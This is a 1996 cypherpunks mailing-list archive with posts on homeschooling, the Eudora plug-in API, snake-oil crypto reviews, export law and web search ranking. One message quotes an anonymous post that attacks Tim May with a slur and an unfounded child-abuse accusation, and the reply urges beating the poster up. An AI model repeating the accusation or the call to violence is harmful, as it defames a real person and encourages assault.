From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 24 Sep 1996 05:49:13 +0800
To: Mike McNally <m5@tivoli.com>
Subject: Re: Public Schools
In-Reply-To: <324677FF.3A48@tivoli.com>
Message-ID: <Pine.OSF.3.91.960923105254.11469A-100000@francis.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


 
One of the hardest things that we have to work hardest to counter-act 
with our twins, who attend PS, is the socialization they 
pick up at school.

Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 24 Sep 1996 06:46:13 +0800
To: Mac Crypto List <coderpunks@toad.com>
Subject: Eudora 3 EMS API stuff
Message-ID: <v03010424ae6c801a5568@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Anyone interested in creating plug-ins for Eudora 3.x that provide
encryption/remailer/etc support needs this information.

   dave

................................. cut here .................................

ABOUT THE API
The EMS API is one of several complimentary facilities available for
integrating 3rd party applications and services with Eudora email.
"Plug-ins" interface with Eudora via the EMS API. For Windows the plug-ins
are DLL's and on the Macintosh they are Components.

Abstractly speaking, the EMS API is most suited for performing
transformations, conversions and some other forms of processing on email
messages as they are sent and received by Eudora.

In practice it is very useful for encryption, digital signatures, and
compression. These are all processes that involve encapsulating a message
attachments and all. The EMS API is also very useful for text processing
and conversions. These might include simple formatting and sorting
utilities, or human language translation, and some forms of text-based
encryption. EMS API plug-ins can be used to do data format conversions on
things ranging from graphic images in attachments to international
character sets.

Another interesting category are plug-ins that process messages in some
way, but don't necessarily change them. For example, a plug-in could be set
up so that it scans certain messages for updates to a database like a
catalog and automatically makes the change in the local database. Another
could be used to scan incoming message attachments for viruses. In a sense,
plug-ins can function as filters.


DOCUMENTS AND SDK
As of the end of July we have documentation and support available at
<ftp://ftp.eudora.com/quest/emsapi> as follows:

  emsapi1.pdf     - Adobe Acrobat document describing  API version 1
                    (current on Mac)
  emsapi2.pdf     - Acrobat document describing the API version 2
                    (current for Windows)
  chngs2.pdf      - Acrobat document showing changes between version 1 & 2

  EMS-API-SDK-1.0b3.hqx   - Macintosh developer's kit

  ems1b2.zip              - The Windows software developer's kit

The developers kit includes a number of support utilities and source code
for four sample plug-ins.


CURRENT STATUS
As of the end of August, Macintosh Eudora Pro 3.0 is shipping and supports
the EMS API version 1. The current Macintosh Eudora Lite (the free version)
does not support the EMS API, but it will and a beta version is expected in
early September if not sooner. Version 1.0b3 of the SDK for the Macintosh
is currently available from our FTP site.

Windows Eudora 3.0 is in beta test right now and supports EMS API version
2. A copy can be obtained from our ftp site. Version 1.0b2 (a public beta
release) of SDK for the API is also now available from our ftp site.


MAILING LIST AND MORE INFORMATION
If you have specific questions about the API you can write to
<mailto:emsapi-info@qualcomm.com>.

If you'd like to keep up to date on the API you can join a mailing list we
have for announcements and discussions. To join, send a message to
<mailto:msapi-dev-request@qualcomm.com>. This mailing list is manually
administered and is not a listserv, majordomo or listproc, so no special
formatting is needed in the request message.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 07:19:20 +0800
To: cypherpunks@toad.com
Subject: Snake Oil Lists, Blacklists, and Anonymity
Message-ID: <ae6c1cfe010210045fb6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:16 PM 9/23/96, Mark Rogaski wrote:

>An entity claiming to be Lance Cottrell wrote:

>: I agree in principle, but for the foreseeable future I think the list will
>: be a "good thing".
>:
>
>As long as the descriptions of the products are comprehensive.  Concern
>about legal issues has been expressed from the beginning.  But, I don't
>think that libel/slander laws will be a stumbling block, as long as
>the publication is similar in nature to "Consumer Reports" or somesuch.

I have to agree with Lance that the "ratings list" is more important and
more useful than the "FAQ." (My comments about the "Snake Oil FAQ" were
directed towards the _educational_ aspects of the FAQ, which I believe are
covering territory already well-covered by good books and existing FAQs. A
list of thumbs ups and thumbs downs, dynamically changing, is another
matter--it is _not_ something covered in published books, due to the time
factor, and would be a contribution.)

However, bear in mind that such a list of products could involve legal
battles. The mention of "Consumer Reports" is apropos of this. CR has been
sued many times, and has a staff of lawyers both reviewing all articles
they post for any hint of litigatable (?) reviews, and for dealing with the
corporate lawyers of companies whose products did not fare well in the CR
reviews. (Recall certain high-profile cases such as the sport utility
vehicle "roll-over" tests.)

Also, one of the audio magazines (or possibly even CR itself...my memory
has faded) was sued in the 1970s by Bose Corporation for an unflattering
review of Bose's flagship loudspeakers, the Bose 901s. The magazine
basically said Bose's "direct-reflecting" multipattern array of small cones
was "snake oil." (I don't know if the mag used this term, but this is what
they said. And "snake oil" is a term used a _lot_ in the audio community,
where snake oil salesmen sell things like the "Tice Clock," an ordinary LED
clock ($7 at Radio Shack) which has been "cryogenically processed" and
which, Tice claims, when plugged in to any wall outlet in the listening
room will improve the soundstage, improve the sound by interpolating bits
into the harsh digital stream, blah blah blah. Of course, Tice charges $200
for their special snake oil clock.)

Back to the list of products. It would be best to handle it through an
anonymous remailer...what others do with it, in terms of reposting it to
public newsgroups  (where Deja News, Yahoo, Alta Vista, etc. could find
it), is their business.

Reviews should be digitally-signed, probably by pseudonyms. The "anonymous
reviewers" would actually be pseudonymous, and reputations would develop
over time. (TANSTAAFL)

The BlackNet model (message pools) could be used to get responses (letters
to the editor?) back from customers, so that one might see messages like:

"My company bought 5 copies of the SnakeTronics ScrambleMatic product, and
found the key is stored in plaintext in the scramble.config file! Needless
to say, we have stopped using ScrambleMatic and have asked SnakeTronics for
our money back! signed, DisgruntledUser."

(In other words, a formal rating or evaluation, perhaps from A to F, or 10
to -10, etc., could be supplemented with "blurbs," both positive and
negative, from users.)

The reason I recommend anonymous remailer distribution, and pseudonyms, is
because of the litigation issue. Even if reviewers are not sued often, the
threat of a suit influences reviews, which is why most reviews in most mags
are puff pieces (glowing reviews, often strongly correlated with who is
advertising in the mag). One can imagine Matt Blaze, for example, choosing
to say _nothing_ about SnakeTronics' ScrambleMatic, for fear (justified)
that he might get letters from their lawyers, thus taking up his time and
even eventually landing him in court.

Also, this sort of "blacklist" paves the way for similar
anonymously-situated blacklists of doctors, lawyers, etc., and you can bet
your last dollar that a list of "bad doctors" would be aggressively pursued
in the courts of all major countries! Hence the use of remailers and
BlackNet-style message pools will be paramount for such things.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 24 Sep 1996 05:23:35 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
Message-ID: <3.0b19.32.19960923103721.00a13340@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Sep 1996, snow wrote:
>I would agree that parents can do as good or better at _most_ 
>subjects thru about the 3rd or 4th grade, and I do agree that 
>most of todays schools are shit, however there is one area--
>social skills--that homeschooling simply can't compete. 

>From John Holt's "Teach Your Own"

"If there were no other reason to homeschool your children, protecting them
from the 'valuable social atmosphere' of the schools would be sufficient."  

John was a commie liberal BTW.  He felt that the schools had a very nasty
and artificial social environment with rigid age segregation that bore no
resemblance to real life where there are people of wider age ranges.
Certainly, most people suffer worse mistreatment from their "peers" at
school than they do later in life.     

As a libertarian, I would add that the social atmosphere of a Stalinist
"brain factory" is not exactly the socialization I would choose for my
children.  I would choose a more market oriented model.

DCF

"Even if they manage to teach nothing else, the very existence of
government schools teaches State supremacy."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 24 Sep 1996 06:37:42 +0800
To: cypherpunks@toad.com
Subject: Bernstein Case in "The Recorder", SF Law newspaper
Message-ID: <199609231817.OAA16098@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I didn't have 4 quarters handy to feed the newspaper machine, but
"The Recorder", a San Francisco law newspaper, has a headline today about
"Feds On The Ropes In Export Law Suit", about the Bernstein case.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Sep 1996 06:06:33 +0800
To: Brian D Williams <cypherpunks@toad.com
Subject: RE: USA_exe
Message-ID: <199609231819.LAA19661@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:27 AM 9/23/96 -0700, Brian D Williams wrote:
>
> 
>John (jya@pipeline.com) posts: 
>  
>>The Washington Post reports at length today on the Defense
>>Department's disclosure yesterday of heretofore classified
>>training manuals used in the School of the Americas to instruct
>>Latino troops on killing a wide range of civilians for political
>>purposes.
>
>This is not particularly new news, I have a copy at home of one of
>these manuals, it was put out by a humans rights group that got
>their hands on it during all the El Salvador business.
>
>It's as nasty as it sounds...

I don't suppose we need ask the question about whether such manuals were 
classified to keep their contents away from the enemy...or the American 
people.   Ooops, same thing I guess.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 24 Sep 1996 05:34:15 +0800
To: Daniel Christopher Miskell <DMiskell@envirolink.org>
Subject: Re: A daily warning regarding Tim ... [edited]
In-Reply-To: <v01540b00ae6c3f4f3884@[150.160.45.149]>
Message-ID: <Pine.SUN.3.91.960923112143.6139A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 23 Sep 1996, Daniel Christopher Miskell wrote:


> Can't lock him out of the list, but you can either set up a kill file, or find
> something like the 3.0b version of Eudora, which has filters; you can set it up
> where, if an incoming message has a certain From: string, it is transferred
> directly into the Trash mail folder, which is, as a rule, cleaned up before
> quitting.

Sure you can.  Setup Majordomo to not accept subjects of "A daily warning 
regarding Tim"  it seems all his messages have the same subject, and it 
seems to be automated.  We can also go asshole on this list and not allow 
anyone who isn't subscribe to post.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Tue, 24 Sep 1996 06:30:58 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: crypto anarchy vs AP
In-Reply-To: <199609221810.TAA00172@server.test.net>
Message-ID: <Pine.SGI.3.91.960923105524.6741A-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain


  
>government power will just be gradually eroded as international 
>businesses gain power, and borders become more open, trade more free, as 
>travel becomes cheaper, and moving to another country becomes less of a 
>hassle. 

Okay, from the top: there are a number of reasons why this won't happen. 
One of the most obvious being that businesses are NOT in the business of 
helping people, they are in the business of making money. Trade will not 
become free, travel will not become cheaper, and if they are given the 
powers of a government they would not likely let it's consumer base move 
to a country with a better dental plan, thus borders would not become more 
open. In fact, I can easily picture business leaders inthe throes of 
ecstacy over the prospect of having 260 million people who have no choice 
but to buy their product because there are no other manufacturers. Another
reson is that government is like a giant bumblebee, not too bright, but if
you keep poking at it with a sharp stick it will sting you. Government 
officials are interested in keeping their cushy jobs and expensive hookers, 
if they start to feel threatened by crypto anarchy, who do you think they're 
going to retaliate against? The guy who runs the blockbuster video on the 
corner? 

>to create the appearance of as free a life style as they can for
>individuals

ever read "1984"? the appearance of a free lifestyle is most definitely 
not a free lifestyle. I am hardly a friend of the state, and far from 
being an advocate of the church, but multinational corporations running 
the world for their own fun and profit makes my sphincter clench. 


clint barnett
emily carr institute





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 24 Sep 1996 06:15:30 +0800
To: "Michael E. Carboy" <carboy@hooked.net>
Subject: Re: Snooping ISP admin??
Message-ID: <199609231830.OAA19726@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:15 AM 9/23/96 -0700, "Michael E. Carboy" <carboy@hooked.net> wrote:
>Question for the group:  I have encountered a situation that causes me
>to believe an ISP is snoopingthrough encrytped mail.  It seems that
>PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. 
Well, if it's encrypted, it shouldn't matter much if they're snooping :-)

>I have
>encountered "POP3 account in use by another user" several times in the
>past few days and I am the only user... wondering if that "in use"
>messsage is the result of a clumsy sysadmin being caught with his hand
>in the cookie jar. 

Three possibilities
1) The sysadmin (unlikely).  Aside from the fact that most sysadmins
know better, it's easier for them to just copy your mailbox to /tmp
and read it with emacs instead of using the POP handler to read it.
2) Crackers, especially if you've got a wimpy password
3) System problems - I use Eudora with my Netcom account, and sometimes
I'll have bad modem connections or Windoze crashes that will hang my
computer or connection in the middle of fetching mail.
This leads to that kind of symptom - the server doesn't quite realize
that I've hung up.  Usually this times out in an hour or two,
but your mileage may vary, especially depending on you're ISP's POP server.

Start by assuming it's a computer problem, then try attributing stupidity,
and only then go for malice. :-)  And if they are snooping, asking them
about the "technical" problems you're having would at least let them
know to stop it.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjh@osa.com.au
Date: Mon, 23 Sep 1996 11:54:27 +0800
To: trei@process.com
Subject: Re: (Fwd) Australian "ITAR" regulations
In-Reply-To: <199609191322.AA02162@minbne.mincom.oz.au>
Message-ID: <199609230132.LAA08960@rosella.osa.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:
> Forwarded from the cypherpunks list...
> http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic

Thanks for posting this URL Peter.  Of particular note is the heading:

> 43.       Other goods as follows:

An anonymous opinion from inside the Defence Dept holds that electronic
bits on a wire do not constitute goods, and as a result if you ship
electronically, you are not subject to the regulations.  If you ship a
CD or floppy or other physical media containing software, you violate the
regulations.

I'll add this to the SSLeay legality FAQ - standard disclaimers apply
of course, obtain professional legal advice before exporting SSLeay.

------------------------------------------------------------
Clifford Heath                          cjh@osa.com.au
Open Software Associates Limited
29 Ringwood Street / P O Box 401        Phone +613 9871 1694
Ringwood  VIC  3134    AUSTRALIA        Fax   +613 9871 1711
------------------------------------------------------------
  Deploy Applications across the Internet and Intranets!
	 Visit our Web site at http://www.osa.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Tue, 24 Sep 1996 06:42:16 +0800
To: Dustbin Freedom Remailer <dustman@athensnet.com>
Subject: Re: A daily word of caution in reference Tim C[unt] May
In-Reply-To: <199609230540.BAA16639@godzilla.athensnet.com>
Message-ID: <Pine.SGI.3.91.960923113934.6741B-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain



is this kind of crap really necessary? Are you that bored? If you have a 
problem, go to his house and beat him up. As for you Tim C. May, call 
your friends and wait in the bushes for this asshole to show up at your 
house. Maybe the rest of them will get the hint that this waste of time 
is deeply unappreciated.

clint barnett
lord of the cosmos
emily carr institute

On Mon, 23 Sep 1996, Dustbin Freedom Remailer wrote:

> Tim C[unt] May is not only as queer as a three dollar bill, but he is also into 
> having sex with children.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 24 Sep 1996 06:42:01 +0800
To: cypherpunks@toad.com
Subject: possible solution to cyber S/N
Message-ID: <199609231847.LAA29832@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I've written many times on the problem of signal to noise
here in cyberspace and have tried to think through some
elegant solutions to this very vexing problem.

moments ago I just came up with an intense brainstorm
fully worthy of sharing with the list <g>.


it's clear that the web functions very much like a directed
graph in many ways. sites and traffic between them are one
graph. however, another graph involves thinking of each
page or "article" on the web as a single node in the graph,
and hyperlinks as the edges between the nodes.

what we have today is a directed graph in which one can
follow the forward direction of hyperlinks very readily.
however, it is much more difficult to follow the reverse
direction, i.e. find "all the sites that reference this paper".
of course this is part of the beauty of the web, that anyone
can link to anyone without actually having to register or
something like that.

the "referrer log" feature on a server is a mechanism that
does allow a server to get some idea of who is linked
up to that site.


the basic idea I have is that references are an excellent
way of discriminating Signal to Noise and are used routinely
in the scientific arena. a paper that is pivotal and influential
is referred to ad infinitum. obscure papers are forgotten and
never referred to in subsequent literature.

taking this idea to the cyberspace arena, the application is
immediately obvious-- pages that are linked to by a lot of 
other pages are valuable, those that are not are not as
valuable.

(another closely related idea is how much hit traffic a web site
gets-- wouldn't it be a *tremendous* improvement in the current
search engines if they returned the pages ranked according to how
many hits they get per time?)

there are some problems with all the above, however. currently
only the site that actually houses the pages can keep track 
of hits, and referrers are not very well kept track of at
all. in a robust system, cheating, such as reporting more hits
than one is getting, would not be possible.

anyway, I tend to think that future S/N problems in cyberspace
are increasingly going to be solved in some particular ways
that are just now being tried out:

1. rating agencies. agencies that both reject and find "cool stuff"
(like Point Communications etc.)

2. hit statistics. how many people are hitting various pages? if
we could get an arbitron-like system that works the same way that
newsgroup readerships are now reported (each site compiles statistics
and sends them to centralized databases) we could have search
engines that rank results according to hit statistics. I'm not
saying it would be perfect, and there are all kinds of obvious
nitpicky things that people here will harp on, but I still insist
it would be better than no statistics at all.

eventually a system like this that involved voluntary submissions of
hit counts to the centralized servers (or just some way of search
engines to get hit statistics from servers about the pages they
own/serve) may evolve into a more robust system that makes cheating
impossible (such as falsely reporting a high hit count to attract
people to the site).

3. linking statistics. again, I think this is an extremely powerful
way of separating signal from noise-- how many other sites are
linked to the page in question? if it has few links, it isn't
as interesting, if a lot of other people point to it, it's far more
interesting.


I encourage system designers to keep some of these ideas in mind
when they are working on the current generation of software tools
such as search engines etc.  in particular there is a tremendous amount
of innovation going on right now between search engine designers, and
adopting some of the above ideas into a search engine might be a very
powerful way of distinguishing it from the "competition" by returning
more useable search results to the end user.

again, I suspect we will be seeing increasingly ingenious and efficacious
ways of dealing with what today is the horrible S/N problem. perhaps
today will be thought of as the dark age of cyberspace because of
all the muck we are routinely wading through <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 24 Sep 1996 06:53:09 +0800
To: cypherpunks@toad.com
Subject: BAA, BAA, SAY THE SHEEPLE
Message-ID: <v0300782bae6c625c4ebd@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Mime-Version: 1.0
Date: Mon, 23 Sep 1996 08:24:36 -0700
To: <other people>, rah@shipwright.com
From: <somebody>
Subject: BAA, BAA, SAY THE SHEEPLE


      COLORADO SENATOR CHARLES DUKE ON THE LOSS OF LIBERTY
         By Senator Charles R. Duke, September 16, 1996
              Colorado District 9,  (719) 481-9289


BAA, BAA, SAY THE SHEEPLE

     Who would have thought America would be where it  is  today?
Earlier  in  the  week,  news  stories appeared announcing that a
proposal to do background checks on regular passengers came  from
a commission studying terrorism.

     This,  of  course,  would  do  absolutely  nothing  to  stop
terrorism.  Any decent terrorist knows enough to not travel under
a real name.  In any case, most airline terrorist incidents  will
likely be caused by someone who doesn't fly on the same plane for
which the incident is planned.

     Since these ideas are patently obvious to  the  most  casual
observers,  what,  then,  is  the purpose of this tyranny?  Is it
simply to get the American sheeple so  accustomed  to  government
spying that we don't mind?

     To do this would require some sort of identification  number
and  what  better  number to use than the Social Security number?
Having the SSN flying around all these databases would also allow
those who have access to such numbers to examine our bank records
and credit history, along with many other records.

     Oh, nuts, I say.  This proposal is just too depressing.   So
I  pick  up  the Wall Street Journal for Friday the Thirteenth of
September.  Might as well read a little financial news to get  in
a  better  mood.  I mean, our economy is really doing okay, or at
least so the government would have us believe.

     I never got to the stock tables.  There, on the front  page,
is  a  story  from  San  Mateo,  California,  where  den mothers,
coaches, and other volunteers who work with children will now  be
subjected to fingerprinting and background checks.  The idea, you
see, is to keep our children safe from child abuse.   Don't  look
now, Toto, but this doesn't feel like Kansas, anymore.

     This will be totally ineffective at curbing child abuse, but
you  probably  already  knew  that.   This writer knows something
about child abuse and can assure everyone that  the  overwhelming
majority  of  child  molesters  become  neither  den  mothers nor
coaches.

     We have a Fourth Amendment to  our  U.S.  Constitution  that
flatly   prohibits  these  unreasonable  searches  and  seizures.
Specifically, the Amendment states, "The right of the  people  to
be  secure in their persons, houses, papers, and effects, against
unreasonable searches and seizures, shall not be violated, and no
Warrants  shall issue, but upon probable cause, supported by Oath
or affirmation, and  particularly  describing  the  place  to  be
searched and the persons or things to be seized."

     It means that our private effects and our private lives  are
none of any civil authority's business, unless they have probable
cause, and  can  obtain  a  warrant,  sworn  to  by  an  oath  or
affirmation  before  a  judge.   The only way any nosy government
gets away with this open and flagrant violation of constitutional
rights is if the sheeple allow it.

     Where is the hue and cry from everyone about these measures?
Have  we  become  so  conditioned  to  prying  eyes  that we have
forgotten what privacy is about?   Why  are  you,  who  have  the
courage  to  read  this column, just standing idly by and letting
our God-given rights be stripped from us on a daily basis?  Where
are the letters to the editor and civil demonstrations about this
blatant tyranny?

     Our forefathers paid for these rights with their  lives  and
their  blood.   They  must  be  churning in their graves with the
lackadaisical attitude we have today about our Constitution. They
fought  a  War  for Independence because King George was allowing
warrantless searches and incarcerations.  It  was  considered  by
our  Founding  Fathers  to  be a sacrilegious violation of rights
granted to us by our Creator and not subject to the rule of Man.

     Somehow, in 1996, we have been lulled into  complacency  and
apathy   by  a  government  totally  dedicated  to  the  absolute
subjugation of our free will.  Most of us have never really  been
free.   We  have  been  enslaved so long it is not clear we would
know how to behave if by some process we  had  our  real  freedom
restored.

     It is possible the American people actually deserve what  is
about  to  happen to us.  We deserve it because of our collective
inaction, our collective morals, our collective  set  of  values,
and our collective embrace of a failed political process.

     There are many examples in history where  societies  created
and  led  by  moral and just people have lasted for long periods.
Almost without exception, the collapse of  these  societies  were
preceded  by  a  loss of character in the people governed.  Where
would you put America today?






--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 24 Sep 1996 05:24:52 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: RE: Where to write crypto?
In-Reply-To: <3.0b19.32.19960923075240.00e9ea44@panix.com>
Message-ID: <Pine.SUN.3.94.960923121505.21884C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996, Duncan Frissell wrote:

> At 08:33 AM 9/23/96 +0200, Remo Pini wrote:
> >Switzerland has NO crypto laws (yet)...
> >
> 
> However they are cooperating with the Gang of Seven (G7) Net restriction
> efforts.  

Switzerland is quickly becoming a G7 puppet.  This is not a new trend.

> 
> See:
> 
> http://www.admin.ch/ejpd/d/bj/internet/indexe.htm
> 
> DCF
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Tue, 24 Sep 1996 06:55:26 +0800
To: loki@infonex.com (Lance Cottrell)
Subject: Re: Snake-Oil FAQ
In-Reply-To: <v03007809ae6a2f216fa1@[206.170.115.3]>
Message-ID: <199609231616.MAA01276@charon.gti.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Lance Cottrell wrote:
: 
: >I think a blacklist of that sort is inherently bad.  I would much rather
: >have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than
: >just be spoon fed a list of good products vs. bad products.  Pardon the
: >cliche, but if you give a man a fish ... etc, etc.
: >
: >mark
: >
: 
: I agree in principle, but for the foreseeable future I think the list will
: be a "good thing".
: 

As long as the descriptions of the products are comprehensive.  Concern
about legal issues has been expressed from the beginning.  But, I don't
think that libel/slander laws will be a stumbling block, as long as 
the publication is similar in nature to "Consumer Reports" or somesuch.


: "Love is a snowmobile racing across the tundra.  Suddenly
: it flips over, pinning you underneath.  At night the ice
: weasels come."
:                         --Nietzsche

Matt Groening?

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMka3wxz4pZwIaHjdAQHm1gf/XTf+a2znIKWNWebUtWUDQnf2ypjX6QOY
nTz3C3bjaoEqn0QicoDr3cvw7DgAde7taNK2RRUSB5wHdmhS4wSE3qacGcyLqmJ4
E51oUYoHoWju+JdTsFDq7IXeqzRhTh2WSdQx52OV7VG+PsFg6AICcDI+28sDqabU
Z+H/3GpOezJqvRRAZEjUzqvKX4HEfs9BQgmlLdXGCRZQ52AxIxE44z8kQpgE2s66
iiPhUEdaSYBnwJGgngpTAVIOPZJYHZG+NthvJpwX/sQFSmTOeIGf6KcKm2nlF+4X
cUELlHi8s9EqmEp/FlzKLQXd+Fd0QL20kNd+sshzU37HYnTKVDn75w==
=dHBB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@pobox.com>
Date: Tue, 24 Sep 1996 07:28:26 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Snake-Oil FAQ
In-Reply-To: <ae6acbab000210047c0c@[207.167.93.63]>
Message-ID: <199609231634.MAA02010@charon.gti.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Timothy C. May wrote:
: 
: The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most
: in need of it won't read it.
: 
: If those who post descriptions of their "Unbreakable Virtual Whammo-Matic
: Really Complicated Transposition Cipher" have not bothered to read Schneier
: or other basic texts on ciphers, why would they bother to read a Snake Oil
: FAQ? This applies to their customers as well.

I disagree, I think AC is a pretty scary book for the kind of people who
need the Snake-Oil FAQ.  I think the primary target audiences are IS 
professionals who are considering integrating crypto into their data
communications and end users who want to send encrypted mail.  Neither
of these groups is going to embrace crypto if you toss them a tome
like AC.  And what is the primary goal here, if not to promote widespread
use of crypto and educate about what makes good crypto good.  We have to
approach the non-believers on their own ground ;)

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMka8HRz4pZwIaHjdAQE8agf+JKgzhzva47IarTXlOmmg869UdWl88WAF
cIQ7uNCXlb7xB9RXmFAHIBTWRy8S+cgkvfEbjPaWmX2dx1038a1Lk96q5kj+6kTq
w0REVj+4FuJ8atgM3PxJljGSzEL5ADjAMicnmKSSBILOK8AU6d/DLquF2Y2rvBgs
7oJkCPH0m/oS87qQuivjEuUoHInrNuvuWC2BrmJ4J7UAvsfT+Zm3WcFpILpvHJ8O
YkVR1IYFU7Q30vaS2eRG4AWCrLcn6tln0fnntGCAjavJz5PD3KMGigRPhE87zdBy
Ht7foguSJwqxI4x+mhJh7PrYoJ6UzqQlqEAbGNTbRJL3CLfs3RStdg==
=7ncj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Sep 1996 10:57:45 +0800
To: cypherpunks@toad.com
Subject: Re: provably hard PK cryptosystems
Message-ID: <ae6c3520030210040b03@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:29 PM 9/23/96, Asgaard wrote:
>On Sun, 22 Sep 1996, Timothy C. May wrote:
>
>> Suppose a tile is placed at some place on the grid, and another tile
>> (possibly a different tile, possibly the same type of tile) is placed some
>> distance away on the grid. The problem is this: Can a "domino snake" be
>> found which reaches from the first tile to the second tile, with the
>> constraint that edges must match up on all tiles? (And all tiles must be in
>> normal grid locations, of course)
>
>Intuitively (but very well not, I'm not informed enough to know)
>this might be a suitable problem for Hellman's DNA computer, the
>one used for chaining the shortest route including a defined
>number of cities?

No, massive parallelism does not help with the _general_ case. (For any
specific instance, especially for a finite grid, obviously the amount of
CPU power is directly relevant.)

Even assuming Adleman's "DNA computer" works and scales relatively well,
its CPU power only goes up roughly with the volume of the computer. While
it may sound impressive to speak of "moles" of computers, or "swimming
pools" of computers, such volumes are utterly inadequate to solve
